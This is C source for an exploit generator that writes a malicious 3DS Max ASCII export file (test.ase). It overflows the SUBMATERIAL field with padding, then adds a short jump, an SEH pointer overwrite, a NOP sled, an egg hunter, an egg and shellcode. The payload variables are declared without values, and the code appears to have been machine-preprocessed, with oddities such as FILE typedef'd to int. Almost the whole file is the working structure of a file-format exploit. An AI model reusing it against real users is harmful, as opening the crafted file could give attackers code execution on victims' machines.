
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int FILE ;


 int close (int *) ;
 char* egg ;
 char* egg_hunter ;
 int * fopen (char*,char*) ;
 int fprintf (int *,char*,...) ;
 int printf (char*,char*) ;
 int putc (char,int *) ;
 char* seh_pointer ;
 char* shellcode ;
 char* short_jump ;

int main(int argc, char **argv) {

    FILE *save_fd;
    int i=0;

    save_fd = fopen("test.ase", "w+");

    if (save_fd == ((void*)0)) {
     printf("Failed to open '%s' for writing", "test.ase");
     return -1;
    }

    fprintf(save_fd, "*3DSMAX_ASCIIEXPORT 200\n"
   "*COMMENT \"created by SSG.\"\n"
   "*SCENE {\n"
   "  *SCENE_FILENAME \"\"\n"
   "  *SCENE_FIRSTFRAME 0\n"
   "  *SCENE_LASTFRAME 100\n"
   "  *SCENE_FRAMESPEED 30\n"
   "  *SCENE_TICKSPERFRAME 160\n"
   "  *SCENE_BACKGROUND_STATIC 0.0000 0.0000 0.0000\n"
   "  *SCENE_AMBIENT_STATIC 0.0431 0.0431 0.0431\n"
   "}\n"
   "*MATERIAL_LIST {\n"
   "  *MATERIAL_COUNT 2\n"
   "  *MATERIAL 0 {\n"
   "    *MATERIAL_NAME \"Material #0\"\n"
   "    *MATERIAL_CLASS \"Standard\"\n"
   "    *MATERIAL_AMBIENT 1.000000 1.000000 1.000000\n"
   "    *MATERIAL_DIFFUSE 1.000000 1.000000 1.000000\n"
   "    *MATERIAL_SPECULAR 0.502000 0.502000 0.502000\n"
   "    *MATERIAL_SHINE 50.000000\n"
   "    *MATERIAL_SHINESTRENGTH 50.000000\n"
   "    *MATERIAL_TRANSPARENCY 0.000000\n"
   "    *MATERIAL_WIRESIZE 1.0000\n"
   "    *MATERIAL_SHADING Blinn\n"
   "    *MATERIAL_XP_FALLOFF 0.0000\n"
   "    *MATERIAL_SELFILLUM 0.0000\n"
   "    *MATERIAL_TWOSIDED\n"
   "    *MATERIAL_FALLOFF In\n"
   "    *MATERIAL_SOFTEN\n"
   "    *MATERIAL_XP_TYPE Filter\n"
   "	*SUBMATERIAL ");
    for(i=0; i < 573; i++) {
     putc('\x41', save_fd);
    }
    fprintf(save_fd, "%s", short_jump);
    fprintf(save_fd, "%s", seh_pointer);
    for(i=0; i < 0x0F; i++) {
     putc('\x90', save_fd);
    }

    fprintf(save_fd, "%s", egg_hunter);
    for(i=0; i < 573; i++) {
     putc('\x41', save_fd);
    }
    fprintf(save_fd, "%s", egg);
    fprintf(save_fd, "%s", shellcode);

    fprintf(save_fd, " {\n");

    close(save_fd);

    return 0;
}
